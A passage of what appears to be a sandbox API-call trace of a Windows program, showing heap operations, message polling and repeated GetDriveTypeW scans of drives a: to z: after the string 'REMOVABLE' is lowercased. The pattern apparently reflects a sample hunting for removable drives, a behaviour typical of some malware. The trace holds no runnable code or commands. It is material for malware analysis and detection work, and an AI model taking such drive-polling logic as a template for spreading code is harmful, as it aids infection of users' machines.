0x14bd2b0 [0210.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0210.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0210.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0210.244] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.244] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.244] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0210.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0210.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.245] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.245] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.245] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.245] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.245] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.245] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.246] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.246] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.246] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.246] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.247] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.247] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.247] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.247] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.247] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.247] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.248] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.248] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.248] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.248] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.249] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.249] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.249] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.249] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.249] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.249] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.250] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0210.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0210.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0210.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0210.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0210.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0210.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.251] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0210.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0210.251] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.252] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0210.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0210.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.252] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.252] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.253] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.253] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.253] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.253] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.253] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.253] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.254] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.254] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.254] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.254] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.254] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.254] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.255] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.255] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.255] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.255] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.255] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.256] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.256] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.256] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.256] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.257] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.257] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.257] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.257] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0210.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0210.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0210.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0210.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.259] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.259] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0210.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.259] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.260] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0210.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.260] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.260] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.260] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.260] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.261] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.261] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.261] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.261] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.261] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.261] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.262] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.262] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.262] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.262] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.262] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.263] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.263] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.263] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.263] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.263] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.264] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.264] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.264] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.264] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.264] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.264] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.265] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.265] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.265] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.265] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 